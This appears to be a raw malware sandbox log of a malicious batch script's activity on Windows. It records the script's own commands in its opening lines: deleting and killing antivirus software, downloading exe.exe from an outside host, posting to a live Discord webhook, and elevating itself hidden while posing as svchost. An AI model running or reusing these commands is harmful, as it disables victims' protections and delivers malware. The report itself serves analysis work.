        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$paths = @(C:\Program Files\Malwarebytes\*.*''C:\Program Files\alwils~1\avast4\*.*', 'C:\Program Files\Lavasoft\Ad-awa~1\*.exe', 'C:\Program Files\kasper~1\*.exe', 'C:\Program Files\trojan~1\*.exe', 'C:\Program Files\f-prot95\*.dll', 'C:\Program Files\tbav\*.dat', 'C:\Program Files\avpersonal\*.vdf', 'C:\Program Files\Norton~1\*.cnt', 'C:\Program Files\Mcafee\*.*', 'C:\Program Files\Norton~1\Norton~3\*.*', 'C:\Program Files\Norton~1\Norton~1\speedd~1\*.*', 'C:\Program Files\Norton~1\Norton~1\*.*', 'C:\Program Files\Norton~1\*.*'); foreach ($p in $paths) { Remove-Item -Path $p -Force -Recurse -ErrorAction SilentlyContinue }"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"Failed to create and change directory to 'C:\\Users\\Public\\Documents\\Secret Document' after retry\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd' -Method Post -Body (@{content='Failed to download exe.exe'} | ConvertTo-Json) -ContentType 'application/json'"
        Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES33AA.tmp" "c:\Users\user\AppData\Local\Temp\l1mwkpcb\CSC55DD152A8365426E9AFFE8E8746FD1A1.TMP"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$process = get-process -id $pid; $process.processoraffinity = 1; $process.priorityclass = 'high'; $process.priorityboostenabled = $true; add-type -typedefinition 'using system; using system.runtime.interopservices; public class win32 { [dllimport(\"user32.dll\")] public static extern bool setwindowdisplayaffinity(intptr hwnd, uint dwaffinity); [dllimport(\"kernel32.dll\")] public static extern bool setprocessworkingsetsize(intptr proc, int min, int max); }'; [win32]::setwindowdisplayaffinity($process.mainwindowhandle, 0x11); [win32]::setprocessworkingsetsize($process.handle, -1, -1); $process.processname = 'svchost'"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$currentprincipal = new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent()); if (-not $currentprincipal.isinrole([security.principal.windowsbuiltinrole]::administrator)) { start-process -filepath 'cmd.exe' -argumentlist '/c c:\users\user\desktop\main.bat.bin.bat' -verb runas -windowstyle hidden; exit }; $process = get-process -id $pid; $process.priorityclass = 'high'; $process.processoraffinity = 1; $process.priorityboostenabled = $true"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$processes = @('mbam', 'mbamservice', 'avastsvc', 'avastui', 'avp', 'avgui', 'bdagent', 'bddownloader', 'bdredline', 'bdss', 'bdservicehost', 'bdnagent', 'bdscan', 'bdcore'); foreach ($p in $processes) { stop-process -name $p -force -erroraction silentlycontinue }"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$s='taskkill /f /im'; $p=@('m'+'bam.exe','mbam'+'service.exe','avast'+'svc.exe','avast'+'ui.exe','a'+'vp.exe','avg'+'ui.exe','bd'+'agent.exe','bddownloader.exe','bdre'+'dline.exe','bd'+'ss.exe','bdserv'+'icehost.exe','bdnagent.exe','bds'+'can.exe','bdc'+'ore.exe'); foreach($i in $p){iex \"$s \"$i\"\"};"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$paths = @(c:\program files\malwarebytes\*.*''c:\program files\alwils~1\avast4\*.*', 'c:\program files\lavasoft\ad-awa~1\*.exe', 'c:\program files\kasper~1\*.exe', 'c:\program files\trojan~1\*.exe', 'c:\program files\f-prot95\*.dll', 'c:\program files\tbav\*.dat', 'c:\program files\avpersonal\*.vdf', 'c:\program files\norton~1\*.cnt', 'c:\program files\mcafee\*.*', 'c:\program files\norton~1\norton~3\*.*', 'c:\program files\norton~1\norton~1\speedd~1\*.*', 'c:\program files\norton~1\norton~1\*.*', 'c:\program files\norton~1\*.*'); foreach ($p in $paths) { remove-item -path $p -force -recurse -erroraction silentlycontinue }"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -s -h "content-type: application/json" -d "{\"content\":\"failed to change directory to 'c:\\users\\public\\documents\\secret document'\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/ddrktnqfrsrxeveloz3obg6_ldiuneiwcygzbdn-1uixnmnnz7zmzvkklapf0rrihbjd"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -s -h "content-type: application/json" -d "{\"content\":\"failed to create and change directory to 'c:\\users\\public\\documents\\secret document' after retry\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/ddrktnqfrsrxeveloz3obg6_ldiuneiwcygzbdn-1uixnmnnz7zmzvkklapf0rrihbjd"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-restmethod -uri 'https://ptb.discord.com/api/webhooks/1291851445620047963/ddrktnqfrsrxeveloz3obg6_ldiuneiwcygzbdn-1uixnmnnz7zmzvkklapf0rrihbjd' -method post -body (@{content='failed to download exe.exe'} | convertto-json) -contenttype 'application/json'"
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2707544758.0000000005360000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2707544758.0000000005360000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Progman
        Source: explorer.exe, 00000017.00000002.2699218188.0000000001439000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman'
        Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetSecurity\Microsoft.Windows.Firewall.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
